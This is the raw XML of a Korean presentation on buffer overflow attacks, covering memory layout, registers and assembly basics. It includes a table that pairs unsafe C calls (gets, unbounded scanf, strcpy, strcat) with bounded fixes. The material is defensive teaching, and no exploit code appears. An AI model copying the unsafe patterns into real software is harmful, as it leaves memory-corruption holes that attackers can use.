                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3665128606"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="375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취약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대응 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600247"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="11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char 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[10];</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>gets(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);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char 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[10];</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/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fgets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>(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, 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sizeof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), stdin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
                        <a:t>입력받을</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t> 크기와 스트립을 인자로 넣어준다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90974"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="11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char 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[10];</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
                        <a:t>scanf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>(“%s”,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);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char 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[10]</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
                        <a:t>scanf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>(“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%9s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>”,buf)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>format string</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>에 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
                        <a:t>입력받을</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t> 크기를 넣어준다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71106"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="11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r>
                        <a:rPr lang="da-DK" altLang="ko-KR"/>
                        <a:t>har buf[10];</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="da-DK" altLang="ko-KR"/>
                        <a:t>strcpy(buf, str);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char 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[10];</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
                        <a:t>str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ko-KR" err="1"/>
                        <a:t>cpy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>(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, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
                        <a:t>str,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sizeof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)-1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>의 크기를 고려하여 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
                        <a:t>입력받는다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74665"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1100844">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="da-DK" altLang="ko-KR"/>
                        <a:t>char buf[10];</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="da-DK" altLang="ko-KR"/>
                        <a:t>strcat(buf, str);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str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ko-KR" err="1"/>
                        <a:t>cat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>, str, 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sizeof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)-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strlen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)-1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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err="1"/>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>의 크기를 고려하여 복사해 준다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348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97E8B8-A8F1-4845-8763-B295CA633392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246591" y="5211097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&lt;VS studio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>사용 시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5F433-6052-4989-A04D-570C68BF06E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7530981" y="608125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일반적 대응 예시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5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79869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spc="-144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이론적 배경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364074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메모리 구조와 프로세스의 구조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3280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레지스터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15760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어셈블리어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21836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BOF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공격의 원리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5BE0BE-52D0-405B-9178-13E5308A0909}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3364291" y="4285181"/>
            <a:ext cx="28777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C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언어의 </a:t>
            </a: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BOF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취약 함수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1230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참고문헌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47F236-8F1E-4A97-809F-CCFF92BF2206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="1538267"/>
            <a:ext cx="75708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[1] 해커 지망자들이 알아야 할 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Attack의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 기초 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>달고나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[2] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> – b0BaNa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[3] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Tutorial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Saif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> El-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Sherei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[3] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>리버싱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 입문 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>조성문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[4] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Embedded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> System - shad0w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23032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37586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메모리 구조와 프로세스의 구조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155BD1-2410-42E1-AEBF-9A0E104C1249}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4456600" y="1534046"/>
            <a:ext cx="4225770" cy="4407764"/>
            <a:chOff x="3983115" y="1526959"/>
            <a:chExt cx="4225770" cy="4407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112188D-BBD0-4253-9566-3AFC1223BE58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3983115" y="1526959"/>
              <a:ext cx="2414726" cy="3789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가용 공간</a:t>
              </a:r>
              <a:endPara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01FE54-2307-4CEA-8887-DA14EE9EBDD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5794159" y="1526959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상위 주소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BBEE61-2465-4C0B-8F66-098B8FAA3EFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5794159" y="5565391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하위 주소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6FA0D0F-7EFD-4721-A813-7D1E9D824639}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3983115" y="5316867"/>
              <a:ext cx="2414726" cy="6178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커널</a:t>
              </a:r>
              <a:endPara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A2C0CF-5509-49A3-9E72-2DEBE6276AA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68062" y="3120072"/>
            <a:ext cx="1183689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2FBF1-2420-4E76-B978-882891B22F54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953094" y="3120072"/>
            <a:ext cx="2414726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223583B-ABBC-4432-AC9D-60CA8A7E75A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1340531" y="3303174"/>
            <a:ext cx="523783" cy="23747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C65475-6D3C-4ED2-B48A-DE65AFC1F169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6871326" y="2438207"/>
            <a:ext cx="1526950" cy="68186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AA3518-44CF-4731-9FDD-07CFFCAB867F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6871326" y="3737928"/>
            <a:ext cx="1526950" cy="61785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7CD28-8E13-4413-A4DB-F02F9F016756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8398276" y="2438207"/>
            <a:ext cx="2139518" cy="658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segment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AF3CDD-B0A1-455A-B029-0294BD931BC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8398276" y="3068130"/>
            <a:ext cx="2139518" cy="658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segment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F0D97F-9FCF-4AB4-884C-5809FC9694A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8398276" y="3737928"/>
            <a:ext cx="2139518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Code segment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ABF7AA-C0C1-47A3-9C48-D39EE4B0835D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953094" y="2214781"/>
            <a:ext cx="2414726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18FD03-5C56-42CE-9629-A67038EF2E54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953094" y="4258130"/>
            <a:ext cx="2414726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2731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20612 0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0612 -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20612 -7.40741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0" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="26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18119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레지스터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571C1-6CF6-4B69-9676-9B256F3725CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2077711" y="3555078"/>
            <a:ext cx="1399391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레지스터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7174F27-FE63-4D8E-9735-3BE23CF4EA9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="215709" y="1525673"/>
            <a:ext cx="3133818" cy="1580225"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19960"/>
              <a:gd name="adj2" fmla="val 68118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빠른 연산을 위해 </a:t>
            </a:r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내부에 존재하는 메모리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BCB2B25-6472-46F3-82A0-44B146F2BA58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3963880" y="2035206"/>
            <a:ext cx="784194" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 29842"/>
              <a:gd name="adj2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FF47F-E8FA-4437-83AD-008295352011}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4978394" y="2200607"/>
            <a:ext cx="2235211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범용 레지스터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C10C0-0618-480D-B3B9-C3AD309751E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4978394" y="3105898"/>
            <a:ext cx="2235211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세그먼트 레지스터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961D3-152A-4DC2-B2E0-3A6FEC8C0CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4978394" y="4011189"/>
            <a:ext cx="2235211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플래그 레지스터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05E64B-3E85-4173-BE18-F16D394375ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4978394" y="4916480"/>
            <a:ext cx="2235211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인스트럭션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레지스터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FB9B7B-9364-4972-9C77-EE30CA57A350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7443925" y="2390796"/>
            <a:ext cx="417749" cy="23747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B46C48-01E7-4181-A556-133F95043A46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8091994" y="2200607"/>
            <a:ext cx="710713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E3FD93-9A4A-4E2C-96B2-D725B686658B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9033027" y="2200607"/>
            <a:ext cx="710713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A5CE2-51A5-4736-B247-96BD5E406B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9974060" y="2200607"/>
            <a:ext cx="710713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A7502A-66E6-4AB0-B41F-495A441B9BAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10915093" y="2450165"/>
            <a:ext cx="118739" cy="11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52AD58-2D19-4271-B8EF-CD7B723B4515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11145413" y="2450165"/>
            <a:ext cx="118739" cy="11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0C6A80-E186-4A4A-93C5-288530F8062D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11375733" y="2450165"/>
            <a:ext cx="118739" cy="11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6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18119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레지스터 구조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3FF21-D3CE-47A4-A6E9-744F2A2C27B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060060" y="2323104"/>
            <a:ext cx="2235211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범용 레지스터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362A9B-E3D7-4231-BD2A-B247FEAE3E07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060059" y="5625364"/>
            <a:ext cx="2235211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인스트럭션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레지스터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FFF19FE-6034-40B0-9B3C-2586FF053BC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3650285" y="5815553"/>
            <a:ext cx="417749" cy="23747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BB8A80-E30A-47D1-A0E3-3D33639EF45C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4423049" y="1217258"/>
            <a:ext cx="710713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0E8D76-B02A-4FD7-88B8-ABDCC9399EEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4402331" y="2323104"/>
            <a:ext cx="710713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5E542428-66A0-4D71-BDB1-35A84CB61623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592214" y="1217258"/>
            <a:ext cx="533892" cy="2829547"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 29842"/>
              <a:gd name="adj2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FB738B-A353-4558-AFEB-EE3809F4AEDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4402330" y="3427537"/>
            <a:ext cx="710713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AF7B30-6440-45CF-A2D7-192323A0D2D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4402330" y="5623824"/>
            <a:ext cx="710713" cy="617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71A1E-AC5E-446E-8188-9749304B1CB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430705" y="1341520"/>
            <a:ext cx="55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실행 시 스택의 맨 끝 주소 값이 저장된다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3D748-C22B-46B3-90B2-71FFA027E348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430705" y="2447365"/>
            <a:ext cx="64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더하기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빼기 등의 연산을 처리할 때 중간 값을 저장하는 공간이다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B7BBF-74B5-4825-A40A-13667F065F45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430705" y="3551799"/>
            <a:ext cx="64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스택 프레임의 시작 주소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(≒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시작 주소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 저장되는 공간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62CC4B-7FCA-4E62-A529-13CB659144D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430705" y="5748086"/>
            <a:ext cx="64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다음에 실행할 명령어가 저장된 메모리 주소가 저장됨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8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8A339C7-5083-4E2A-AD7A-CA214594FB5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="14923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어셈블리어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0A6FD-4148-4AE9-A0CD-4BD04AE115D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2162414" y="3075057"/>
            <a:ext cx="81188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spc="300">
                <a:latin typeface="나눔스퀘어" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔스퀘어" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>L1 mov %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" spc="3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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" spc="300">
                <a:latin typeface="나눔스퀘어" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔스퀘어" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" spc="3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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" spc="300">
                <a:latin typeface="나눔스퀘어" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔스퀘어" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> comment</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4000" spc="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E3C7323-F7C4-457F-ACD4-FCE3C381125B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2368846" y="3806223"/>
            <a:ext cx="417749" cy="2374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059D2-AC1A-4C55-B096-CA0BF0F9632A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051871" y="4179486"/>
            <a:ext cx="1051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endParaRPr lang="ko-KR" altLang="en-US" sz="2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3D528B2-3042-4D45-B063-CFA697B68F43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3457751" y="2768649"/>
            <a:ext cx="417749" cy="2374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D4438-84DC-4868-A353-6257FC0BC857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3083773" y="20775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572600-BA1F-44F3-B766-BB865C67D1EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4912021" y="3806223"/>
            <a:ext cx="417749" cy="2374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572E9-97CC-4B0E-862E-3EF192B690A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3979215" y="4162363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제 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오퍼랜드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E845ED0-AE1B-44E2-989E-DBE89ED76FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6712650" y="2768650"/>
            <a:ext cx="417749" cy="2374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CA901-1A25-4BAA-A944-D8C83EF02058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
